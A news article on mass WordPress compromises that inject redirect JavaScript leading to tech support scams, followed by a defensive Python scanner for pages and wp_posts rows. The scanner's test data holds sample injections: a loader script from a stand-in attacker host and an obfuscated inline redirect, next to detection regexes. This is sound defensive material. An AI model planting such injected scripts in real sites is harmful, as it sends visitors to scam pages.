Couldn't give a fsck about patching? Well, that's your WordPress website pwned, then

Fiends use vulns to lure victims into tech support scams

Website admins are urged to update their WordPress installations as soon as possible to the latest version following a rash of attacks exploiting known vulnerabilities in the web publishing software.

Researchers at Malwarebytes say miscreants don't appear to be targeting any one specific bug, but rather a full array of flaws in older versions of WordPress and its various plugins.

"During the past few days, our crawlers have been catching a larger-than-usual number of WordPress sites being hijacked," noted Malwarebytes researcher Jérôme Segura on Thursday.

"One of the most visible client-side payloads we see is redirections to tech support scam pages. Digging deeper, we found that this is part of a series of attacks that have compromised thousands of WordPress sites since early September."

According to Segura and researchers at Sucuri, the attackers have been exploiting flaws that let them inject malicious JavaScript into pages, usually either in the HTML <head> of the page or in the post content stored in the wp_posts table of the WordPress database.

From there, the injected code runs whenever the site is loaded and redirects visitors to scam pages – most notably fake tech support sites and hard-to-dismiss "evil cursor" scareware screens.

Admins are advised to check their pages for signs of the injected JavaScript and, where possible, work out how the attackers got in.

"Website owners affected by these attacks will have to perform a thorough cleanup of injected pages, databases, and backdoors," Segura explained.

"More importantly, they will need to identify the root cause of the compromise, which oftentimes is an outdated WordPress installation or plugin."
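Both places the researchers point to – the HTML <head> of a served page and the post content held in wp_posts – can be checked with a short script. The following Python is an added example for this article, not tooling from Malwarebytes, Sucuri or the WordPress project: it flags <script> tags that load from a host outside an allow-list and inline scripts that contain redirect or obfuscation patterns. The trusted host example.com, the regular expressions and the sample page and post rows are constructed for illustration; the rows stand in for the result of `SELECT ID, post_content FROM wp_posts`.

```python
"""Scan a WordPress page and wp_posts rows for injected redirect scripts.

Added example for this article; not Malwarebytes' or Sucuri's tooling.
The allow-list, regexes and sample data are constructed for illustration.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts whose <script src> is expected on the site. Assumption: example.com
# is the site's own domain; add your CDN and analytics hosts here.
TRUSTED_SCRIPT_HOSTS = {"example.com", "www.example.com"}

# Inline-script fragments typical of forced-redirect / scareware injections.
SUSPICIOUS_INLINE = re.compile(
    r"(window|document|top|self)\.location(\.href)?\s*=|"
    r"location\.(replace|assign)\(|"
    r"String\.fromCharCode|unescape\(|eval\(|atob\(",
    re.IGNORECASE,
)


class _ScriptCollector(HTMLParser):
    """Collect every <script> tag as (src attribute or None, inline body)."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._in_script = False
        self._src = None
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script = True
            self._src = dict(attrs).get("src")
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self.scripts.append((self._src, "".join(self._buf)))
            self._in_script = False


def find_injected_scripts(html, trusted_hosts=TRUSTED_SCRIPT_HOSTS):
    """Return a list of findings (strings) for suspicious <script> tags."""
    parser = _ScriptCollector()
    parser.feed(html)
    parser.close()
    findings = []
    for src, body in parser.scripts:
        if src is not None:
            # A relative path (no host) is served by the site itself; an
            # absolute or scheme-relative src from an unknown host is flagged.
            host = urlparse(src).hostname
            if host and host.lower() not in trusted_hosts:
                findings.append(f"external script from untrusted host: {src}")
        elif SUSPICIOUS_INLINE.search(body):
            findings.append("inline redirect/obfuscation pattern: "
                            + " ".join(body.split())[:70])
    return findings


def scan_wp_posts(rows, trusted_hosts=TRUSTED_SCRIPT_HOSTS):
    """rows: iterable of (ID, post_content), i.e. the result of
    SELECT ID, post_content FROM wp_posts. Returns {ID: [findings]}."""
    hits = {}
    for post_id, content in rows:
        findings = find_injected_scripts(content, trusted_hosts)
        if findings:
            hits[post_id] = findings
    return hits


# Constructed samples: a clean page, a page whose <head> carries an injected
# external loader, and two wp_posts rows, one clean and one with an inline
# redirect hidden behind String.fromCharCode.
CLEAN_PAGE = """<html><head><title>Blog</title>
<script src="/wp-includes/js/jquery/jquery.js"></script>
<script src="https://www.example.com/wp-content/themes/x/theme.js"></script>
</head><body><p>Hello</p></body></html>"""

INJECTED_HEADER = """<html><head><title>Blog</title>
<script type="text/javascript" src="//evil.example/js/loader.js"></script>
</head><body><p>Hello</p></body></html>"""

SAMPLE_WP_POSTS = [
    (1, "<p>Welcome to the site.</p>"),
    (2, "<p>Post</p><script>window.location.href=String.fromCharCode(104,116)"
        "+'tps://support-alert.example/';</script>"),
]

if __name__ == "__main__":
    for name, page in (("clean page", CLEAN_PAGE),
                       ("injected header", INJECTED_HEADER)):
        print(name, "->", find_injected_scripts(page) or "no findings")
    for post_id, findings in scan_wp_posts(SAMPLE_WP_POSTS).items():
        print(f"wp_posts ID {post_id}:", *findings, sep="\n  ")
```

Run it against a saved copy of the front page and a dump of wp_posts. A hit is a lead for the cleanup Segura describes, not proof on its own: legitimate themes and plugins also pull scripts from third-party hosts, so extend TRUSTED_SCRIPT_HOSTS for your own site before treating an empty result as clean, and remember the scan says nothing about backdoors left in PHP files.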

WordPress is no stranger to large-scale attacks. The widely used CMS is an attractive target because a single flaw in the core software or a popular plugin gives attackers a way to quietly compromise many sites at once and plant code for further attacks.

Earlier this year, fellow CMS Drupal found itself in the firing line as attackers seized on a bug known as 'Drupalgeddon' to inject things like cryptocoin-mining scripts into pages. ®

Biting the hand that feeds IT © 1998–2022